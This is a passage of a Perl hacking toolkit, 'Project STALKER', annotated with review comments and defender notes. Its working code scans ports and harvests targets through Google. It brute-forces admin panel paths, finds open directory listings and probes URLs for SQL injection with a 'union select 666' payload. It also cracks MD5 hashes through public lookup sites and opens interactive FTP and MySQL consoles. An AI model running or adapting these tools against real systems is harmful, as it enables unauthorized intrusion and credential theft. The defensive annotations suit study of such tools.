            chomp (my $cmd = <stdin>);
            print "\n\n";

            if ($cmd=~/help/) {
                print q(

help : show information
cd : change directory <dir>
dir : list a directory
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory  
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>
exit : ??


);
            }

            # Directory listing.
            if ($cmd=~/dir/ig) {
                if (my @files = $socket->dir()) {
                    for(@files) {
                        print "[+] ".$_."\n";
                    }
                } else {
                    print "\n\n[-] Error\n\n";
                }
            }

            if ($cmd=~/pwd/ig) {
                print "[+] Path : ".$socket->pwd()."\n";
            }

            if ($cmd=~/cd (.*)/ig) {
                if ($socket->cwd($1)) {
                    print "[+] Directory changed\n";
                } else {
                    print "\n\n[-] Error\n\n";
                }
            }

            if ($cmd=~/cdup/ig) {
                if (my $dir = $socket->cdup()) {
                    print "\n\n[+] Directory changed\n\n";
                } else {
                    print "\n\n[-] Error\n\n";
                }
            }

            if ($cmd=~/del (.*)/ig) {
                if ($socket->delete($1)) {
                    print "[+] File deleted\n";
                } else {
                    print "\n\n[-] Error\n\n";
                }
            }

            if ($cmd=~/rename (.*) (.*)/ig) {
                if ($socket->rename($1,$2)) {
                    print "[+] File Updated\n";
                } else {
                    print "\n\n[-] Error\n\n";
                }
            }

            if ($cmd=~/mkdir (.*)/ig) {
                if ($socket->mkdir($1)) {
                    print "\n\n[+] Directory created\n";
                } else {
                    print "\n\n[-] Error\n\n";
                }
            }

            if ($cmd=~/rmdir (.*)/ig) {
                if ($socket->rmdir($1)) {
                    print "\n\n[+] Directory deleted\n";
                } else {
                    print "\n\n[-] Error\n\n";
                }
            }

            if ($cmd=~/exit/ig) {
                next;
            }

            # Transfers: first capture is the source, second the destination.
            if ($cmd=~/get (.*) (.*)/ig) {
                print "\n\n[+] Downloading file\n\n";
                if ($socket->get($1,$2)) {
                    print "[+] Download completed";
                } else {
                    print "\n\n[-] Error\n\n";
                }
            }

            if ($cmd=~/put (.*) (.*)/ig) {
                print "\n\n[+] Uploading file\n\n";
                if ($socket->put($1,$2)) {
                    print "[+] Upload completed";
                } else {
                    print "\n\n[-] Error\n\n";
                }
            }

            if ($cmd=~/quit/) {
                next;
            }

            goto menu;

        } else {
            print "\n[-] Failed the login\n\n";
        }

    } else {
        print "\n\n[-] Error\n\n";
    }



}
  1222.  
# Look an MD5 hash up in four third-party web services and return the first
# plaintext one of them reports, or the string "false01" if none does.
#
# %hash maps each service URL to how it is queried:
#   tipo      - "get" means the hash is appended to the URL and fetched with
#               toma(); entries without it are POSTed with tomar()
#   variables - form fields for the POST case
#   regex     - pattern whose first capture is the plaintext in the response
#
# NOTE(review):
#   * The hash under test is sent to external sites over plain http://, so
#     it is disclosed to those operators and to anyone on the network path.
#   * $target is interpolated into two of the patterns unescaped.
#   * Entries without `tipo` are compared with eq against undef.
#   * `last` after `return` is unreachable in both branches.
#   * keys %hash has no defined order, so the services are tried in varying
#     order between runs.
#
# Writes the package global $code.
sub crackit {

    my $target = shift;

    chomp $target;

    my %hash = (

    'http://md5.hashcracking.com/search.php?md5=' =>  {
    'tipo' => 'get',
    'regex' => "Cleartext of $target is (.*)",
    },

    'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
    'variables'=>{'search_field'=>$target,'Submit'=>'search'},
    'regex' => "<td><li>Your md5 hash is :<br><li>$target is <b>(.*)<\/b>",
    },

    'http://md5.rednoize.com/?q=' =>  {
    'tipo'=> 'get',
    'regex' => "<div id=\"result\" >(.*)<\/div>"
    },

    'http://md52.altervista.org/index.php?md5=' =>  {
    'tipo'=> 'get',
    'regex' => "<br>Password: <font color=\"Red\">(.*)<\/font><\/b>"
    }

    );

    for my $data(keys %hash) {
        if ($hash{$data}{tipo} eq "get") {
            $code = toma($data.$target);
            if ($code=~/$hash{$data}{regex}/ig) {
                my $found = $1;
                # "[Non Trovata]" is treated as a negative answer and skipped.
                unless($found=~/\[Non Trovata\]/) {
                    return $found;
                    last;
                }}}
        else {
            $code = tomar($data,$hash{$data}{variables});
            if ($code=~/$hash{$data}{regex}/ig) {
                my $found = $1;
                return $found;
                last;
            }}}
    return "false01";
}
  1271.  
  1272. sub ver_length {
  1273. return true if length($_[0]) == 32;
  1274. }
  1275.  
  1276.  
# Look for directories with auto-indexing enabled on the site at $_[0].
#
# It fetches the page, extracts its links (get_links), removes duplicates
# (repes), strips the file name from each same-site link and requests the
# remaining directory URL. A response containing "Index Of" is reported and
# appended to logs/paths-found.txt.
#
# Defender notes: disabling directory auto-indexing on the web server (for
# Apache, `Options -Indexes`) removes what this check finds. In access logs
# it shows up as a run of requests for directory URLs without a file name.
#
# NOTE(review): $auth and $borrar are interpolated into regexes unescaped,
# so dots and other metacharacters in host or file names match loosely.
#
# Writes the package globals $url (loop variable) and $code.
sub scanpaths {

    my $urla = $_[0];

    print "\n[+] Find paths in $urla\n\n\n";
    my @urls = repes(get_links(toma($urla)));
    for $url(@urls) {
        my $web = $url;
        my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
        # Keep links on the same host, or relative links without an authority.
        if ($_[0] =~/$auth/ or $auth eq "") {
            if ($path=~/(.*)\/(.*)\.(.*)$/) {
                my $borrar = $2.".".$3;
                if ($web=~/(.*)$borrar/) {
                    my $co = $1;
                    unless ($co=~/$auth/) {
                        $co = $urla.$co;
                    }
                    $code = toma($co);
                    if ($code=~/Index Of/ig) {
                        print "[Link] : ".$co."\n";
                        saveyes("logs/paths-found.txt",$co);
                    }}}}}}
  1299.  
  1300.  
  1301. sub scanport {
  1302.  
  1303. my %ports = ("21"=>"ftp",
  1304. "22"=>"ssh",
  1305. "25"=>"smtp",
  1306. "80"=>"http",
  1307. "110"=>"pop3",
  1308. "3306"=>"mysql"
  1309. );
  1310.  
  1311.  
  1312. print "[+] Scanning $_[0]\n\n\n";
  1313.  
  1314. for my $port(keys %ports) {
  1315.  
  1316. if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
  1317. print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
  1318. }
  1319. }
  1320. print "\n\n[+] Finish\n";
  1321. }
  1322.  
  1323.  
# Request every path from the package-level list @panels (defined outside
# this excerpt) below the base URL in $_[0]. Each URL that answers with a
# successful HTTP status is printed and appended to logs/panel-logs.txt.
#
# Defender notes: this produces a fast series of requests for guessed paths,
# most of which return 404. Rate limiting and alerting on 404 bursts from
# one client detect it, and authentication on administrative paths is what
# actually protects them.
#
# Writes the package globals $path (loop variable) and $code.
sub scanpanel {
    print "[+] Scanning $_[0]\n\n\n";
    for $path(@panels) {
        $code = tomax($_[0]."/".$path);
        if ($code->is_success) {
            print "[Link] : ".$_[0]."/".$path."\n";
            saveyes("logs/panel-logs.txt",$_[0]."/".$path);
        }
    }
    print "\n\n[+] Finish\n";
}
  1335.  
# Collect result URLs for a search query from www.google.com.ar.
#
#   $a - query string, appended to the search URL as given
#   $b - upper bound for the "start" offset; pages are fetched at 10, 20, ...
#
# Every result link is URL-unescaped, cut after its first "=" by cortar()
# and de-duplicated by repes(); the remaining list is returned.
#
# NOTE(review):
#   * `my ($a,$b)` declares lexicals named like sort's special variables.
#   * @founds is declared twice with `my` in the same scope.
#   * The scraping pattern depends on the result-page markup of the time.
#
# Writes the package globals $pages and $code.
sub google {
    my($a,$b) = @_;
    my @founds;
    for ($pages=10;$pages<=$b;$pages=$pages+10) {
        $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
        while($code=~/(?<="r"><. href=")(.+?)"/mig) {
            my $url = $1;
            if($url=~/\/url\?q\=(.*?)\&amp\;/) {
                push(@founds,uri_unescape($1));
            }}}
    my @founds = repes(cortar(@founds));
    return @founds;
}
  1349.  
# Probe one URL for an error-revealing SQL injection point: append
# "-1+union+select+666--" and check whether the response contains MySQL's
# "different number of columns" error text. Matching URLs are printed and
# appended to logs/sql-logs.txt.
#
# Defender notes: the probe only reports a hit when the application echoes
# database errors to the client, so suppressing error output hides the
# signal, and parameterized queries remove the flaw. The literal
# "union+select+666" in a request is a direct signature of this check.
#
# Writes the package global $code1.
sub sql {

    my ($pass1,$pass2) = ("+","--");
    my $page = shift;
    $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
    if ($code1=~/The used SELECT statements have a different number of columns/ig) {
        print "[+] SQLI : $page\a\n";
        saveyes("logs/sql-logs.txt",$page);
    }}
  1359.  
# Extract link attribute values from the HTML text in $_[0] with
# HTML::LinkExtor and return the package-level list @links.
#
# NOTE(review):
#   * @links is a package global that is never cleared here, so links from
#     earlier calls appear to stay in the returned list.
#   * `agarrar` is a named sub declared inside this one. Named subs are
#     global in Perl, so the nesting has no scoping effect.
#
# Writes the package globals $test and @links.
sub get_links {

    $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
    return @links;

    # Callback for HTML::LinkExtor: $a is the tag name, %b its link attributes.
    sub agarrar {
        my ( $a, %b ) = @_;
        push( @links, values %b );
    }}
  1369.  
  1370.  
  1371. sub repes {
  1372. my @limpio;
  1373. foreach $test(@_) {
  1374. push @limpio,$test unless $repe{$test}++;
  1375. }
  1376. return @limpio;
  1377. }
  1378.  
  1379. sub cortar {
  1380. my @nuevo;
  1381. for(@_) {
  1382. if ($_ =~/=/) {
  1383. @tengo = split("=",$_);
  1384. push(@nuevo,@tengo[0]."=");
  1385. } else {
  1386. push(@nuevo,$_);
  1387. }}
  1388. return @nuevo;
  1389. }
  1390.  
  1391. sub head {
  1392. cprint "\x0311"; #13
  1393. print "\n\n-- == Project STALKER == --\n\n";
  1394. cprint "\x030";
  1395. }
  1396.  
  1397. sub copyright {
  1398. cprint "\x0311"; #13
  1399. print"\n\n(C) Doddy Hackman 2012\n\n";
  1400. cprint "\x030";
  1401. }
  1402.  
  1403. sub toma {
  1404. return $nave->get($_[0])->content;
  1405. }
  1406.  
  1407. sub tomax {
  1408. return $nave->get($_[0]);
  1409. }
  1410.  
  1411. sub tomar {
  1412. my ($web,$var) = @_;
  1413. return $nave->post($web,[%{$var}])->content;
  1414. }
  1415.  
  1416.  
  1417. sub conectar {
  1418.  
  1419. my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
  1420. Proto => "tcp",Timeout  => 5);
  1421.  
  1422. print $sockex $_[2]."\r\n";
  1423. $sockex->read($re,5000);
  1424. $sockex->close;
  1425. return $re."\r\n";
  1426. }
  1427.  
  1428.  
# Interactive MySQL console: connect to $host on port 3306 with DBI, then
# read statements from standard input and print their results until the
# operator types "exit".
#
#   $host - database server
#   $user - account name
#   $pass - password
#
# NOTE(review):
#   * The return values of prepare() and execute() are not checked. Failure
#     is inferred afterwards from rows() being -1.
#   * @{$re->{NAME}} is read before that check, i.e. also for failed
#     statements.
#   * Statements are run exactly as typed. That is the purpose of a console,
#     but it means there is no guard against destructive statements.
#
# Defender note: a database port reachable from untrusted networks with
# password-only authentication is the precondition for using this against a
# server. Bind the port to internal interfaces and restrict account hosts.
#
# Writes the package globals $info, $re and @row.
sub enter {

    my ($host,$user,$pass) = @_;

    print "[+] Connecting to the server\n";

    $info = "dbi:mysql::".$host.":3306";
    if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {

        print "\n[+] Enter in the database";

        while(1) {
            print "\n\n\n[+] Query : ";
            chomp(my $ac = <stdin>);

            if ($ac eq "exit") {
                $enter->disconnect;
                print "\n\n[+] Closing connection\n\n";
                last;
            }

            $re = $enter->prepare($ac);
            $re->execute();
            my $total = $re->rows();

            my @columnas = @{$re->{NAME}};

            if ($total eq "-1") {
                print "\n\n[-] Query Error\n";
                next;
            } else {
                print "\n\n[+] Result of the query\n";
                if ($total eq 0) {
                    print "\n\n[+] Not rows returned\n\n";
                } else {
                    print "\n\n[+] Rows returned : ".$total."\n\n\n";
                    # Header row with column names, then one line per result row.
                    for(@columnas) {
                        print $_."\t\t";
                    }
                    print "\n\n";
                    while (@row = $re->fetchrow_array) {
                        for(@row) {
                            print $_."\t\t";
                        }
                        print "\n";
                    }}}}
    } else {
        print "\n[-] Error connecting\n";
    }}
  1478.  
  1479. sub encode {
  1480. my $string = $_[0];
  1481. $hex = '0x';
  1482. for (split //,$string) {
  1483. $hex .= sprintf "%x", ord;
  1484. }
  1485. return $hex;
  1486. }
  1487.  
  1488. sub saveyes {
  1489. open (SAVE,">>".$_[0]);
  1490. print SAVE $_[1]."\n";
  1491. close SAVE;
  1492. }
  1493.  
  1494. sub savefile {
  1495. open (SAVE,">>logs/webs/".$_[0]);
  1496. print SAVE $_[1]."\n";
  1497. close SAVE;
  1498. }
  1499.  
  1500. sub coleccionar {
  1501. opendir DIR,$_[0];
  1502. my @archivos = readdir DIR;
  1503. close DIR;
  1504. return @archivos;
  1505. }
  1506.  
# Resolve a host name to an IP address, then print what two public lookup
# sites report about it: city, country and region from melissadata.com, and
# the host names listed for that address by ip-adress.com.
#
# NOTE(review):
#   * $target is declared with `my` twice in the same scope; the second
#     declaration holds the dotted-quad address.
#   * A failed DNS lookup is not handled, so inet_ntoa then receives undef.
#   * Both lookups are plain http:// requests to third parties, which
#     therefore learn which address is being looked up.
#   * The patterns depend on the HTML those sites served at the time.
#
# Writes the package globals $total and $re.
sub infocon {
    my $target = shift;

    my $get = gethostbyname($target);
    my $target = inet_ntoa($get);

    print "[+] Getting info\n\n\n";
    $total = "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
    $re = toma($total);

    if ($re=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/) {
        print "[+] City : $2\n";
    } else {
        print "[-] Not Found\n";
        copyright();
    }
    if ($re=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/) {
        print "[+] Country : $2\n";
    }
    if ($re=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/) {
        print "[+] State or Region : $2\n";
    }

    print "\n\n[+] Getting Hosts\n\n\n";

    # Reverse-IP listing: one [DNS] line per host name found in the page.
    my $code = toma("http://www.ip-adress.com/reverse_ip/".$target);

    while($code=~/whois\/(.*?)\">Whois/g) {
        my $dns = $1;
        chomp $dns;
        print "[DNS] : $dns\n";
    }
}
  1540.  
# Fetch the WHOIS record for a domain from a third-party web form and return
# its text.
#
# The domain is POSTed to networking.ringofsaturn.com, the first <pre> block
# of the answer is taken, and the entities listed in @chau are removed.
# Returns the text if it contains "Whois Server Version", otherwise the
# string "Not Found".
#
# NOTE(review): when the response has no <pre> block there is no explicit
# return, so the result is whatever the failed match produced. Callers
# should not rely on getting "Not Found" in that case.
sub whois {

    my $ob = shift;
    my $code = tomar("http://networking.ringofsaturn.com/Tools/whois.php",{"domain"=>$ob,"submit"=>"submit"});

    # HTML entities stripped from the record before it is returned.
    my @chau = ("&quot;","&gt;&gt;&gt;","&lt;&lt;&lt;");

    if($code=~/<pre>(.*?)<\/pre>/sig) {
        my $resul = $1;
        chomp $resul;

        for my $cha(@chau) {
            $resul=~s/$cha//ig;
        }

        if($resul=~/Whois Server Version/) {
            return $resul;
        } else {
            return "Not Found";
        }}}
  1561.  
  1562. sub partimealmedio {
  1563. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  1564. my $save = $auth;
  1565. $save=~s/:/_/;
  1566. return $save;
  1567. }
  1568.  
# Print the command reference of the interactive console, between two colour
# control sequences sent through cprint (imported from Color::Output at the
# top of the file). The text is a fixed list; it is not generated from the
# command dispatcher.
sub helpme {

    cprint "\x035";
    print qq(
This program was coded By Doddy Hackman in the year 2012

[+] Commands :

[++] cmd_getinfo [Windows Only]
[++] cmd_getip <host>
[++] cmd_getlink <page>
[++] cmd_getprocess [Windows Only]
[++] cmd_killprocess <pid process> [Windows Only]
[++] cmd_conec <host> <port> <command>  
[++] cmd_allow <host>
[++] cmd_paths <page>
[++] cmd_encodehex <text>
[++] cmd_decodehex <text>
[++] cmd_encodeascii <text>
[++] cmd_decodeascii <text>
[++] cmd_encodebase <text>
[++] cmd_decodebase <text>
[++] cmd_scanport <host>
[++] cmd_panel <page>
[++] cmd_getpass <hash>
[++] cmd_kobra <page>
[++] cmd_ftp <host> <user> <pass>
[++] cmd_mysql <host> <user> <pass>
[++] cmd_locate <ip>
[++] cmd_whois <dom>
[++] cmd_navegator
[++] cmd_scangoogle
[++] cmd_help
[++] cmd_exit
);
    cprint "\n\n\n\x030";
}
  1606.  
  1607. #  The End ?